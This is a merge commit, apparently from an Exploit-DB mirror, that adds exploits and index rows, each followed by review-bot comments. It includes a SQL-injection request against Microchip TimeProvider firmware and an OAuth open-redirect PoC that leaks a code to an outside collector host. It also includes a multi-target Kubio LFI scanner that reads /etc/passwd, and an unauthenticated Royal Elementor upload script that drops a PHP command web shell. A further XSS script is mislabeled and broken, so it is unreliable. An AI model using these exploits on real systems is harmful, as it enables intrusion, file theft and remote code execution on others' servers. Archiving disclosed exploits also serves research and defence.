Merge remote-tracking branch 'exploitdb/main'

Brendan McDevitt 2025-04-07 00:01:26 +00:00
commit b779de90fb
7 changed files with 636 additions and 1 deletions

@ -0,0 +1,117 @@
# Exploit Title: Microchip TimeProvider 4100 Grandmaster - Unauthenticated SQL Injection
# Exploit Author: Armando Huesca Prida, Marco Negro
# Discovered By: Armando Huesca Prida, Marco Negro, Antonio Carriero, Vito Pistillo, Davide Renna, Manuel Leone, Massimiliano Brolli
# Date of Disclosure: 27/06/2024
# Date of CVE Publication: 4/10/2024
# Exploit Publication: 11/10/2024
# Vendor Homepage: https://www.microchip.com/
# Version: Firmware release 1.0 through 2.4.7
# Tested on: Firmware release 2.3.12
# CVE: CVE-2024-7801
# External References:
# URL: https://www.cve.org/cverecord?id=CVE-2024-7801
# URL: https://www.0xhuesca.com/2024/10/cve-2024-7801.html
# URL: https://www.microchip.com/en-us/solutions/technologies/embedded-security/how-to-report-potential-product-security-vulnerabilities/timeprovider-4100-grandmaster-unathenticated-sql-injection
# URL: https://www.gruppotim.it/it/footer/red-team.html
# Vulnerability Description:
The TimeProvider® 4100 Grandmaster firmware has a SQL injection vulnerability in the “get_chart_data” web resource, specifically the “channelId” parameter is inserted directly into the SQL query (SQLite) at the table's name query parameter from which the FROM operation is performed. Unauthenticated threat actors can manipulate queries to execute malicious SQL commands against the device.
# Example of Malicious SQL Payload:
SELECT%20sql%202,%203,%204,%205,%206,%207,%208,%209,%2010,%2011,%2012,%2013,%2014,%2015,%2016,%2017,%2018,%2019,%2020,%2021,%2022,%2023,%2024,%2025,%2026,%2027,%2028,%2029,%2030,%2031,%2032,%2033,%2034,%2035,%2036,%2037,%2038,%2039,%2040,%2041,%2042,%2043,%2044,%2045,%2046,%2047,%2048,%2049,%2050,%2051,%2052,%2053,%2054,%2055,%2056,%2057,%2058,%2059,%2060,%2061,%2062,%2063,%2064,%2065,%2066,%2067,%2068%20FROM%20sqlite_master$20WHERE&20type='table'$20LIMIT%201%20OFFSET%200--
# Proof of Concept - PoC:
By manually modifying the following request, it is possible to execute malicious SQL commands against the device. The list of values that must be updated in the exploit HTTP request is given below:
- [malicious SQL payload]
- [device IP]
# Exploit - HTTP Request:
POST /get_chart_data HTTP/1.1
Host: [device IP]
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 146
Origin: https://[device IP]
Referer: https://[device IP]/perfmon_synce_stat
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: keep-alive
metric=mtie_a&xRange=1&tStart=-1&channelName=tenMHz&channelId=
1_status%20UNION%20 [malicious SQL payload] %20UNION%20SELECT%201,%202,%203,%204,%205,%206,%207,%208,%209,%2010,%2011,%2012,%2013,%2014,%2015,%2016,%2017,%2018,%2019,%2020,%2021,%2022,%2023,%2024,%2025,%2026,%2027,%2028,%2029,%2030,%2031,%2032,%2033,%2034,%2035,%2036,%2037,%2038,%2039,%2040,%2041,%2042,%2043,%2044,%2045,%2046,%2047,%2048,%2049,%2050,%2051,%2052,%2053,%2054,%2055,%2056,%2057,%2058,%2059,%2060,%2061,%2062,%2063,%2064,%2065,%2066,%2067,%2068%20FROM%20tenMHz1
# End
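Review bot: the header lists "Version: Firmware release 1.0 through 2.4.7" and "Tested on: Firmware release 2.3.12" but names no fixed release or mitigation, so a reader cannot tell from this entry which firmware closes CVE-2024-7801. Add a line with the fixed version or a pointer to the Microchip advisory already listed under "External References". The text under "# Vulnerability Description:", "# Proof of Concept - PoC:" and the request itself is not "#"-prefixed while the header is, so the file mixes commented metadata with bare prose; use one convention throughout.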

@ -0,0 +1,182 @@
- IBM Security Verify Access >= 10.0.0 <= 10.0.8 - Open Redirect during OAuth Flow
======== < Table of Contents > ================================================
0. Overview
1. Detailed Description
2. Proof Of Concept
3. Solution
4. Disclosure Timeline
5. References
6. Credits
7. Legal Notices
======== < 0. Overview > ======================================================
Revision:
1.0
Impact:
By persuading a victim to visit a specially crafted Web site, a remote
attacker could exploit this vulnerability to spoof the URL displayed
to redirect a user to a malicious Web site that would appear to be
trusted. This could allow the attacker to obtain highly sensitive
information or conduct further attacks against the victim.
Severity:
NIST: High
IBM: Medium
CVSS Score:
NIST 8.2 (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N)
IBM 6.8 (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:N/I:H/A:N)
CVE-ID:
CVE-2024-35133
Vendor:
IBM
Affected Products:
IBM Security Verify Access
IBM Security Verify Access Docker
Affected Versions:
10.0.0 - 10.0.8
Product Description:
IBM Security Verify Access is a complete authorization and network
security policy management solution. It provides end-to-end protection
of resources over geographically dispersed intranets and extranets.
In addition to state-of-the-art security policy management, IBM Security
Verify Access provides authentication, authorization, data security, and
centralized resource management capabilities.
IBM Security Verify Access offers the following features:
Authentication ~ Provides a wide range of built-in authenticators and
supports external authenticators.
Authorization ~ Provides permit and deny decisions for protected resources
requests in the secure domain through the authorization API.
Data security and centralized resource management ~ Manages secure access
to private internal network-based resources by using the public Internet's
broad connectivity and ease of use with a corporate firewall system.
======== < 1. Detailed Description > ==========================================
During a Penetration Test of the OAuth flow for a client, it was found an
Open Redirect vulnerability that can led to the leakage of the OAuth "code" variable.
It was possible to bypass the parser's logic responsible for verifying the
correctness and the validity of the "redirect_uri" parameter during an OAuth
flow by leveraging RFC 3986 (3.2.1) providing a username and password directly
in the Uniform Resource Identifier (URI).
By providing as the "username" field a legitimate and expected domain, it
was possible to bypass the whitelist filter used by "IBM Security Verify Access"
and cause an Open Redirect to any arbitrary domain controlled by the attacker,
not only altering the expected flow and redirect a user to a malicious
Web site that would appear to be trusted.
This could allow the attacker to obtain highly sensitive like the OAuth "code"
token or conduct further attacks against the victim
======== < 2. Proof of Concepts > =============================================
===== REQUEST =====
[[
GET /oauth/oauth20/authorize?response_type=code&client_id=[REDACTED]&state=001710863806728MPUw0xFSj&REDACTED_uri=https://legitimate.domain:bypass@0lmd9sa7p0cez16vdcldhcgygpmga6yv.oastify.com/[REDACTED]/openid/REDACTED/[REDACTED]&scope=openid+ HTTP/1.1
Host: [REDACTED]
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close
]]
===== RESPONSE =====
[[
HTTP/1.1 302 Found
content-language: en-US
date: Tue, 19 Mar 2024 16:04:35 GMT
location: https://legitimate.domain:bypass@0lmd9sa7p0cez16vdcldhcgygpmga6yv.oastify.com/[REDACTED]/openid/REDACTED/[REDACTED]?state=001710863806728MPUw0xFSj&code=7wkH581y0uyS0nm4ff65zCqHn0WC46w7v&iss=[REDACTED]
p3p: CP="NON CUR OTPi OUR NOR UNI"
x-frame-options: DENY
x-content-type-options: nosniff
cache-control: no-store
x-xss-protection: 1; mode=block
x-permitted-cross-domain-policies: none
cross-origin-resource-policy: same-site
content-security-policy: frame-ancestors 'none'
referrer-policy: no-referrer-when-downgrade
strict-transport-security: max-age=31536000; includeSubDomains
pragma: no-cache
Content-Length: 0.
]]
======== < 3. Solution > ======================================================
Refer to IBM Security Bulletin 7166712 for patch, upgrade or
suggested workaround information.
See "References" for more details.
======== < 4. Disclosure Timeline > ===========================================
19/03/2024 - Vulnerability discovered by the Security Researcher (Giulio Garzia)
21/03/2024 - Vulnerability shared with the client who committed the
Penetration Test on his infrastructure, relying on IBM SVA
02/04/2024 - Vulnerability shared with IBM
02/04/2024 - Vulnerability taken over by IBM
14/05/2024 - Vulnerability confirmed by IBM
18/07/2024 - Pre-release provided by IBM to the customer to verify the
resolution of the vulnerability
27/08/2024 - Security Bulletin and vulnerability shared by IBM
======== < 5. References > ====================================================
(1) https://www.ibm.com/support/pages/security-bulletin-security-vulnerability-was-fixed-ibm-security-verify-access-cve-2024-35133
(2) https://exchange.xforce.ibmcloud.com/vulnerabilities/291026
(3) https://nvd.nist.gov/vuln/detail/CVE-2024-35133
(4) https://cwe.mitre.org/data/definitions/178.html
======== < 6. Credits > =======================================================
This vulnerability was discovered and reported by:
Giulio Garzia 'Ozozuz'
Contacts:
https://www.linkedin.com/in/giuliogarzia/
https://github.com/Ozozuz
======== < 7. Legal Notices > ================================================
Copyright (c) 2024 Giulio Garzia "Ozozuz"
Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without mine express
written consent. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically,
please email me for permission.
Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information.
Use of the information constitutes acceptance for use in an AS IS
condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct,
indirect, or consequential loss or damage arising from use of,
or reliance on,this information.
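Review bot: in the section 2 request the query parameter is written "REDACTED_uri=" while section 1 describes the flaw in the "redirect_uri" parameter, so the redaction pass appears to have replaced the word "redirect" and the request no longer matches the description (the same applies to "/openid/REDACTED/" in the path). Restore the parameter name and limit redaction to client-specific values. The response still shows the "state" and "code" values and the 302 target host in clear; confirm these are meant to be published or replace them with placeholders as was done for "client_id". Minor: "Content-Length: 0." carries a stray full stop, and the section 2 heading reads "Proof of Concepts" where the table of contents has "Proof Of Concept".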

@ -0,0 +1,10 @@
# Exploit Title: Next.js Middleware Bypass Vulnerability (CVE-2025-29927)
# Date: 2025-03-26
# Exploit Author: kOaDT
# Vendor Homepage: https://nextjs.org/
# Software Link: https://github.com/vercel/next.js
# Version: 13.0.0 - 13.5.8 / 14.0.0 - 14.2.24 / 15.0.0 - 15.2.2 / 11.1.4 - 12.3.4
# Tested on: Ubuntu 22.04.5 LTS
# CVE: CVE-2025-29927
# PoC: https://raw.githubusercontent.com/kOaDT/poc-cve-2025-29927/refs/heads/main/exploit.js
# POC GitHub Repository: https://github.com/kOaDT/poc-cve-2025-29927/tree/main
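Review bot: the "# PoC:" line points at a raw.githubusercontent.com URL on "refs/heads/main", a mutable branch reference, and the entry itself contains no description or code, so what this archived record refers to can change or disappear after the merge. Pin the link to a commit hash and add a short description of the issue and the fixed releases so the entry is self-contained. The "# Version:" line also lists the 11.1.4 - 12.3.4 range after the 15.x range; ordering the ranges ascending would make it easier to check a deployed version against them.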

@ -0,0 +1,134 @@
# Exploit Title: Kubio AI Page Builder <= 2.5.1 - Local File Inclusion (LFI)
# Date: 2025-04-04
# Exploit Author: Sheikh Mohammad Hasan (https://github.com/4m3rr0r)
# Vendor Homepage: https://wordpress.org/plugins/kubio/
# Software Link: https://downloads.wordpress.org/plugin/kubio.2.5.1.zip
# Reference: https://www.cve.org/CVERecord?id=CVE-2025-2294
# Version: <= 2.5.1
# Tested on: WordPress 6.4.2 (Ubuntu 22.04 LTS)
# CVE: CVE-2025-2294
"""
Description:
The Kubio AI Page Builder plugin for WordPress contains a Local File Inclusion vulnerability
in the `kubio_hybrid_theme_load_template` function. This allows unauthenticated attackers to
read arbitrary files via path traversal. Can lead to RCE when combined with file upload capabilities.
"""
import argparse
import re
import requests
from urllib.parse import urljoin
from concurrent.futures import ThreadPoolExecutor
class Colors:
HEADER = '\033[95m'
OKBLUE = '\033[94m'
OKGREEN = '\033[92m'
WARNING = '\033[93m'
FAIL = '\033[91m'
ENDC = '\033[0m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
def parse_version(version_str):
parts = list(map(int, version_str.split('.')))
while len(parts) < 3:
parts.append(0)
return tuple(parts[:3])
def check_plugin_version(target_url):
readme_url = urljoin(target_url, 'wp-content/plugins/kubio/readme.txt')
try:
response = requests.get(readme_url, timeout=10)
if response.status_code == 200:
version_match = re.search(r'Stable tag:\s*([\d.]+)', response.text, re.I)
if not version_match:
return False, "Version not found"
version_str = version_match.group(1).strip()
try:
parsed_version = parse_version(version_str)
except ValueError:
return False, f"Invalid version format: {version_str}"
return parsed_version <= (2, 5, 1), version_str
return False, f"HTTP Error {response.status_code}"
except Exception as e:
return False, f"Connection error: {str(e)}"
def exploit_vulnerability(target_url, file_path, show_content=False):
exploit_url = f"{target_url}/?__kubio-site-edit-iframe-preview=1&__kubio-site-edit-iframe-classic-template={file_path}"
try:
response = requests.get(exploit_url, timeout=10)
if response.status_code == 200:
if show_content:
print(f"\n{Colors.OKGREEN}[+] File content from {target_url}:{Colors.ENDC}")
print(Colors.OKBLUE + response.text + Colors.ENDC)
return True
return False
except Exception as e:
return False
def process_url(url, file_path, show_content, output_file):
print(f"{Colors.HEADER}[*] Checking: {url}{Colors.ENDC}")
is_vuln, version_info = check_plugin_version(url)
if is_vuln:
print(f"{Colors.OKGREEN}[+] Vulnerable: {url} (Version: {version_info}){Colors.ENDC}")
exploit_success = exploit_vulnerability(url, file_path, show_content)
if output_file and exploit_success:
with open(output_file, 'a') as f:
f.write(f"{url}\n")
return url if exploit_success else None
else:
print(f"{Colors.FAIL}[-] Not vulnerable: {url} ({version_info}){Colors.ENDC}")
return None
def main():
parser = argparse.ArgumentParser(description="Kubio Plugin Vulnerability Scanner")
group = parser.add_mutually_exclusive_group(required=True)
group.add_argument("-u", "--url", help="Single target URL (always shows file content)")
group.add_argument("-l", "--list", help="File containing list of URLs")
parser.add_argument("-f", "--file", default="../../../../../../../../etc/passwd",
help="File path to exploit (default: ../../../../../../../../etc/passwd)")
parser.add_argument("-o", "--output", help="Output file to save vulnerable URLs")
parser.add_argument("-v", "--verbose", action="store_true",
help="Show file contents when using -l/--list mode")
parser.add_argument("-t", "--threads", type=int, default=5,
help="Number of concurrent threads for list mode")
args = parser.parse_args()
# Determine operation mode
if args.url:
# Single URL mode - always show content
process_url(args.url, args.file, show_content=True, output_file=args.output)
elif args.list:
# List mode - handle multiple URLs
with open(args.list, 'r') as f:
urls = [line.strip() for line in f.readlines() if line.strip()]
print(f"{Colors.BOLD}[*] Starting scan with {len(urls)} targets...{Colors.ENDC}")
with ThreadPoolExecutor(max_workers=args.threads) as executor:
futures = []
for url in urls:
futures.append(
executor.submit(
process_url,
url,
args.file,
args.verbose,
args.output
)
)
vulnerable_urls = [future.result() for future in futures if future.result()]
print(f"\n{Colors.BOLD}[*] Scan complete!{Colors.ENDC}")
print(f"{Colors.OKGREEN}[+] Total vulnerable URLs found: {len(vulnerable_urls)}{Colors.ENDC}")
if args.output:
print(f"{Colors.OKBLUE}[+] Vulnerable URLs saved to: {args.output}{Colors.ENDC}")
if __name__ == "__main__":
main()
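Review bot: in list mode process_url() runs on ThreadPoolExecutor workers and each worker opens output_file in append mode with no lock, so concurrent writes can interleave; return the URL from the worker (it already does) and write the file once in main() after the pool finishes. The final list comprehension calls future.result() twice per future, and exploit_vulnerability() binds "e" in "except Exception as e" and then discards it, so a connection failure is reported exactly like a negative result. A target is also counted under "Total vulnerable URLs found" on any HTTP 200 without the body being inspected, so that figure is not confirmed by the response content and should be labelled as unverified.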

@ -0,0 +1,91 @@
# Exploit Title: Exclusive Addons for Elementor ≤ 2.6.9 - Authenticated Stored Cross-Site Scripting (XSS)
# Original Author: Wordfence Security Team
# Exploit Author: Al Baradi Joy
# Exploit Date: March 13, 2024
# Vendor Homepage: https://exclusiveaddons.com/
# Software Link: https://wordpress.org/plugins/exclusive-addons-for-elementor/
# Version: Up to and including 2.6.9
# Tested Versions: 2.6.9
# CVE ID: CVE-2024-1234
# Vulnerability Type: Stored Cross-Site Scripting (XSS)
# Description:
The Exclusive Addons for Exclusive Addons for Elementor for WordPress, in versions up to
and including 2.6.9, is vulnerable to stored cross-site scripting (XSS) via
the 's' parameter. Due to improper input sanitization and output escaping,
an attacker with contributor-level permissions or higher can inject
arbitrary JavaScript that executes when a user views the affected page.
# Proof of Concept: Yes
# Categories: Web Application, Cross-Site Scripting (XSS), WordPress Plugin
# CVSS Score: 6.5 (Medium)
# CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
# Notes:
To exploit this vulnerability, an attacker needs an authenticated user role
with permission to edit posts. Injecting malicious JavaScript can lead to
session hijacking, redirections, and other client-side attacks.
## Exploit Code:
```python
import requests
from urllib.parse import urlparse
# Banner
def display_banner():
exploit_title = "CVE-2024-1234: Exclusive Addons for Elementor Plugin
Stored XSS"
print("="*50)
print(f"Exploit Title: {exploit_title}")
print("Made By Al Baradi Joy")
print("="*50)
# Function to validate URL
def validate_url(url):
# Check if the URL is valid and well-formed
parsed_url = urlparse(url)
if not parsed_url.scheme in ["http", "https"]:
print("Error: Invalid URL. Please ensure the URL starts with http://
or https://")
return False
return True
# Function to exploit XSS vulnerability
def exploit_xss(target_url):
# The XSS payload to inject
payload = "<script>alert('XSS Exploit')</script>"
# The parameters to be passed (in this case, we are exploiting the 's'
parameter)
params = {
's': payload
}
# Send a GET request to the vulnerable URL with the payload
try:
print(f"Sending exploit to: {target_url}")
response = requests.get(target_url, params=params, timeout=10)
# Check if the status code is OK and if the payload is reflected in
the response
if response.status_code == 200 and payload in response.text:
print(f"XSS exploit successful! Payload: {payload}")
elif response.status_code != 200:
print(f"Error: Received non-OK status code
{response.status_code}")
else:
print("Exploit failed or no XSS reflected.")
except requests.exceptions.RequestException as e:
print(f"Error: Request failed - {e}")
except Exception as e:
print(f"Unexpected error: {e}")
if __name__ == "__main__":
# Display banner
display_banner()
# Ask the user for the target URL
target_url = input("Enter the target URL: ").strip()
# Validate the provided URL
if validate_url(target_url):
# Call the exploit function if URL is valid
exploit_xss(target_url)
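Review bot: the header and description call this an authenticated stored XSS that needs contributor-level permissions, but exploit_xss() sends one unauthenticated GET with the payload in the 's' query parameter and only checks whether it is echoed in that same response, which is a reflection check with no login and no stored content. Align the description with what the script does, or the script with the description, before this is indexed as "Stored Cross-Site Scripting". The file is also not valid Python as committed: a "python" code fence is opened after "## Exploit Code:" and never closed, and the string literals for exploit_title and two of the print() calls are wrapped across lines. The description line repeats "Exclusive Addons for" twice.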

@ -0,0 +1,95 @@
# Exploit Title: WordPress Plugin Royal Elementor Addons <= 1.3.78 - Unauthenticated Arbitrary File Upload (RCE)
# Date: 2025-04-04
# Exploit Author: Sheikh Mohammad Hasan (https://github.com/4m3rr0r)
# Vendor Homepage: https://royal-elementor-addons.com
# Software Link: https://downloads.wordpress.org/plugin/royal-elementor-addons.1.3.78.zip
# Version: <= 1.3.78
# Tested on: WordPress 6.3.1, Royal Elementor Addons 1.3.78, Ubuntu 22.04 + Apache2 + PHP 8.1
# CVE: CVE-2023-5360
# Description:
# The Royal Elementor Addons and Templates WordPress plugin before 1.3.79 does not properly validate uploaded files,
# which allows unauthenticated users to upload arbitrary files (such as .php), leading to Remote Code Execution (RCE).
import requests
import json
import re
import argparse
import tempfile
from urllib.parse import urljoin
from rich.console import Console
requests.packages.urllib3.disable_warnings()
console = Console()
def get_nonce(target):
try:
r = requests.get(target, verify=False, timeout=10)
m = re.search(r'var\s+WprConfig\s*=\s*({.*?});', r.text)
if m:
nonce = json.loads(m.group(1)).get("nonce")
return nonce
except:
pass
return None
def upload_shell(target, nonce, file_path):
ajax_url = urljoin(target, "/wp-admin/admin-ajax.php")
with open(file_path, "rb") as f:
files = {"uploaded_file": ("poc.ph$p", f.read())}
data = {
"action": "wpr_addons_upload_file",
"max_file_size": 0,
"allowed_file_types": "ph$p",
"triggering_event": "click",
"wpr_addons_nonce": nonce
}
try:
r = requests.post(ajax_url, data=data, files=files, verify=False, timeout=10)
if r.status_code == 200 and "url" in r.text:
resp = json.loads(r.text)
return resp["data"]["url"]
except:
pass
return None
def generate_default_shell():
with tempfile.NamedTemporaryFile(delete=False, suffix=".php") as tmp:
shell_code = '<?php echo "Shell by 4m3rr0r - "; system($_GET["cmd"]); ?>'
tmp.write(shell_code.encode())
return tmp.name
def main():
parser = argparse.ArgumentParser(description="Royal Elementor Addons <= 1.3.78 - Unauthenticated Arbitrary File Upload (RCE)")
parser.add_argument("-u", "--url", required=True, help="Target WordPress URL (e.g., https://target.com/)")
parser.add_argument("-f", "--file", help="Custom PHP shell file to upload")
args = parser.parse_args()
console.print("[cyan][*] Getting nonce from WprConfig JS object...[/cyan]")
nonce = get_nonce(args.url)
if not nonce:
console.print("[red][-] Failed to retrieve WprConfig nonce.[/red]")
return
console.print(f"[green][+] Nonce found: {nonce}[/green]")
if args.file:
shell_file = args.file
console.print(f"[cyan][*] Using provided shell: {shell_file}[/cyan]")
else:
console.print("[cyan][*] No shell provided. Creating default RCE shell...[/cyan]")
shell_file = generate_default_shell()
console.print(f"[green][+] Default shell created at: {shell_file}[/green]")
console.print("[cyan][*] Uploading shell...[/cyan]")
uploaded_url = upload_shell(args.url, nonce, shell_file)
if uploaded_url:
console.print(f"[green][+] Shell uploaded successfully: {uploaded_url}[/green]")
if not args.file:
console.print(f"[yellow][>] Access it with: {uploaded_url}?cmd=id[/yellow]")
else:
console.print("[red][-] Upload failed. Target may be patched or not vulnerable.[/red]")
if __name__ == "__main__":
main()
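Review bot: get_nonce() and upload_shell() both end in a bare "except: pass", so a timeout, a TLS failure, a JSON decode error and a missing "data"/"url" key all collapse into the same None, and main() then prints "Target may be patched or not vulnerable" for what may be a network fault. Catch requests.exceptions.RequestException, ValueError and KeyError explicitly and report the cause. Separately, generate_default_shell() uses NamedTemporaryFile(delete=False) and nothing removes the file afterwards, and certificate checking is switched off for every request via verify=False together with disable_warnings(); both deserve at least a comment, and the temp file should be deleted once the upload returns.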

@ -3762,6 +3762,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
40589,exploits/hardware/remote/40589.html,"MiCasaVerde VeraLite - Remote Code Execution",2016-10-20,"Jacob Baines",remote,hardware,,2016-10-20,2016-10-27,0,CVE-2013-4863;CVE-2016-6255,,,,,
52119,exploits/hardware/remote/52119.NA,"Microchip TimeProvider 4100 (Configuration modules) 2.4.6 - OS Command Injection",2025-04-04,"Armando Huesca Prida",remote,hardware,,2025-04-04,2025-04-04,0,CVE-2024-9054,,,,,
52120,exploits/hardware/remote/52120.NA,"Microchip TimeProvider 4100 Grandmaster (Banner Config Modules) 2.4.6 - Stored Cross-Site Scripting (XSS)",2025-04-04,"Armando Huesca Prida",remote,hardware,,2025-04-04,2025-04-04,0,CVE-2024-43687,,,,,
52122,exploits/hardware/remote/52122.NA,"Microchip TimeProvider 4100 Grandmaster (Data plot modules) 2.4.6 - SQL Injection",2025-04-05,"Armando Huesca Prida",remote,hardware,,2025-04-05,2025-04-05,0,CVE-2024-7801,,,,,
45040,exploits/hardware/remote/45040.txt,"Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway - Default Credentials",2018-07-17,LiquidWorm,remote,hardware,,2018-07-17,2018-07-17,0,,,,,,
45578,exploits/hardware/remote/45578.cpp,"MicroTik RouterOS < 6.43rc3 - Remote Root",2018-10-10,"Jacob Baines",remote,hardware,,2018-10-10,2018-10-10,0,CVE-2018-14847,Remote,,,,
41718,exploits/hardware/remote/41718.txt,"Miele Professional PG 8528 - Directory Traversal",2017-03-24,"Jens Regel",remote,hardware,,2017-03-24,2017-03-24,0,CVE-2017-7240,,,,,
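Review bot: the added row 52122 gives the version as "2.4.6" in the description field, while the exploit file added in this same commit states "Version: Firmware release 1.0 through 2.4.7" and "Tested on: Firmware release 2.3.12"; 2.4.6 appears in neither line. Use the tested version or the affected range so the index agrees with the file. The title in the file also says "Unauthenticated SQL Injection" and the row drops "Unauthenticated", which is the detail most relevant for triage.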
@ -11882,6 +11883,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
48376,exploits/multiple/webapps/48376.txt,"EspoCRM 5.8.5 - Privilege Escalation",2020-04-24,Besim,webapps,multiple,,2020-04-24,2020-04-24,0,,,,,,
38016,exploits/multiple/webapps/38016.txt,"ESRI ArcGIS for Server - 'where' SQL Injection",2012-11-09,anonymous,webapps,multiple,,2012-11-09,2017-11-09,1,CVE-2012-4949;OSVDB-87277,,,,,https://www.securityfocus.com/bid/56474/info
10209,exploits/multiple/webapps/10209.txt,"Everfocus 1.4 - EDSR Remote Authentication Bypass",2009-10-14,"Andrea Fabrizi",webapps,multiple,,2009-10-13,,1,CVE-2009-3828;OSVDB-59139,,2009-11-22-EverFocus_Edsr_Exploit.tar.gz,,,
52126,exploits/multiple/webapps/52126.py,"Exclusive Addons for Elementor 2.6.9 - Stored Cross-Site Scripting (XSS)",2025-04-05,"Al Baradi Joy",webapps,multiple,,2025-04-05,2025-04-05,0,CVE-2024-1234,,,,,
49146,exploits/multiple/webapps/49146.txt,"Expense Management System - 'description' Stored Cross Site Scripting",2020-12-02,"Nikhil Kumar",webapps,multiple,,2020-12-02,2020-12-02,0,,,,,,
49760,exploits/multiple/webapps/49760.txt,"ExpressVPN VPN Router 1.0 - Router Login Panel's Integer Overflow",2021-04-13,"Jai Kumar Sharma",webapps,multiple,,2021-04-13,2021-04-13,0,CVE-2020-29238,,,,,
49432,exploits/multiple/webapps/49432.sh,"EyesOfNetwork 5.3 - File Upload Remote Code Execution",2021-01-15,"Audencia Business SCHOOL Red Team",webapps,multiple,,2021-01-15,2021-01-15,0,,,,,,
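Review bot: row 52126 files a WordPress plugin issue under exploits/multiple/webapps with platform "multiple", although the index has a php/webapps tree (see the last hunk of this file); the same applies to rows 52125 and 52127 added further down. If the platform column is used for filtering, these three entries will be missed by anyone searching the php platform, so either move them or document why WordPress plugins are classified as "multiple".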
@ -11959,6 +11961,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
15473,exploits/multiple/webapps/15473.html,"IBM OmniFind - Cross-Site Request Forgery",2010-11-09,"Fatih Kilic",webapps,multiple,,2010-11-09,2010-11-09,0,CVE-2010-3891;OSVDB-69083,,,,,
46017,exploits/multiple/webapps/46017.txt,"IBM Operational Decision Manager 8.x - XML External Entity Injection",2018-12-19,"Mohamed M.Fouad",webapps,multiple,9443,2018-12-19,2018-12-19,1,CVE-2018-1821,"XML External Entity (XXE)",,,,
32631,exploits/multiple/webapps/32631.txt,"IBM Rational ClearCase 7/8 - Cross-Site Scripting",2008-12-01,IBM,webapps,multiple,,2008-12-01,2014-04-01,1,CVE-2008-5330;OSVDB-50369,,,,,https://www.securityfocus.com/bid/32574/info
52123,exploits/multiple/webapps/52123.NA,"IBM Security Verify Access 10.0.0 - Open Redirect during OAuth Flow",2025-04-05,"Giulio Garzia",webapps,multiple,,2025-04-05,2025-04-05,0,CVE-2024-35133,,,,,
45190,exploits/multiple/webapps/45190.txt,"IBM Sterling B2B Integrator 5.2.0.1/5.2.6.3 - Cross-Site Scripting",2018-08-13,"Vikas Khanna",webapps,multiple,,2018-08-13,2018-08-13,1,CVE-2018-1563;CVE-2018-1513,,,,,
34908,exploits/multiple/webapps/34908.txt,"IBM Tivoli Access Manager for E-Business - '/ibm/wpm/acl?method' Cross-Site Scripting",2010-10-22,IBM,webapps,multiple,,2010-10-22,2014-10-06,1,CVE-2010-4120;OSVDB-68885,,,,,https://www.securityfocus.com/bid/44382/info
34909,exploits/multiple/webapps/34909.txt,"IBM Tivoli Access Manager for E-Business - '/ibm/wpm/domain?method' Cross-Site Scripting",2010-10-22,IBM,webapps,multiple,,2010-10-22,2014-10-06,1,CVE-2010-4120;OSVDB-68886,,,,,https://www.securityfocus.com/bid/44382/info
@ -12024,6 +12027,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
50521,exploits/multiple/webapps/50521.py,"KONGA 0.14.9 - Privilege Escalation",2021-11-15,"Fabricio Salomao",webapps,multiple,,2021-11-15,2021-11-15,0,,,,,http://www.exploit-db.comkonga-0.14.9.zip,
34224,exploits/multiple/webapps/34224.txt,"Kryn.cms 6.0 - Cross-Site Request Forgery / HTML Injection",2010-06-29,TurboBorland,webapps,multiple,,2010-06-29,2014-08-01,1,,,,,,https://www.securityfocus.com/bid/41229/info
52097,exploits/multiple/webapps/52097.NA,"KubeSphere 3.4.0 - Insecure Direct Object Reference (IDOR)",2025-03-27,"Okan Kurtulus",webapps,multiple,,2025-03-27,2025-03-27,0,CVE-2024-46528,,,,,https://github.com/advisories/GHSA-p26r-gfgc-c47h
52125,exploits/multiple/webapps/52125.py,"Kubio AI Page Builder 2.5.1 - Local File Inclusion (LFI)",2025-04-05,4m3rr0r,webapps,multiple,,2025-04-05,2025-04-05,0,CVE-2025-2294,,,,,
49733,exploits/multiple/webapps/49733.txt,"Latrix 0.6.0 - 'txtaccesscode' SQL Injection",2021-04-01,cptsticky,webapps,multiple,,2021-04-01,2021-04-01,0,,,,,,
48453,exploits/multiple/webapps/48453.txt,"LibreNMS 1.46 - 'search' SQL Injection",2020-05-11,Punt,webapps,multiple,,2020-05-11,2020-05-11,0,,,,,,
49246,exploits/multiple/webapps/49246.py,"LibreNMS 1.46 - MAC Accounting Graph Authenticated SQL Injection",2020-12-14,Hodorsec,webapps,multiple,,2020-12-14,2020-12-14,0,,,,,,
@ -12120,6 +12124,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
49160,exploits/multiple/webapps/49160.txt,"NewsLister - Authenticated Persistent Cross-Site Scripting",2020-12-02,"Emre Aslan",webapps,multiple,,2020-12-02,2020-12-02,0,,,,,,
43911,exploits/multiple/webapps/43911.html,"Nexpose < 6.4.66 - Cross-Site Request Forgery",2018-01-28,"Shwetabh Vishnoi",webapps,multiple,,2018-01-28,2018-01-28,0,CVE-2017-5264,,,,,
